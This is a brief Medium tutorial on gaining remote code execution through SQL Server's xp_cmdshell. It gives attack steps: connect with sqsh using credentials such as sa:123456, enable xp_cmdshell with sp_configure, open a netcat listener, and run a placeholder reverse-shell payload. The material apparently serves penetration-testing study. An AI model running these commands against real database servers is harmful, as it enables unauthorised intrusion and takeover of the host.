SQL Server — xp_cmdshell to RCE

Basic Information

Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications — which may run either on the same computer or on another computer across a network (including the Internet). From Wikipedia.

What is xp_cmdshell?

xp_cmdshell is an extended stored procedure provided by Microsoft and stored in the master database. This procedure allows you to issue operating system commands directly to the Windows command shell via T-SQL code. It is dangerous as trojans and worms can use it to access the system.

Requirement

Microsoft SQL Server Credentials
- username and password ex. sa:123456

Step to Attack

  1. First, We are using sqsh for getting database shell by command following below.
sqsh -S <IP> -U <Username> -P <Password>
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
go
xp_cmdshell 'whoami';
go
nc -lnvp 443
xp_cmdshell '<payload>'; go

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
GrimTheRipper

You get the best out of others when you give the best of yourself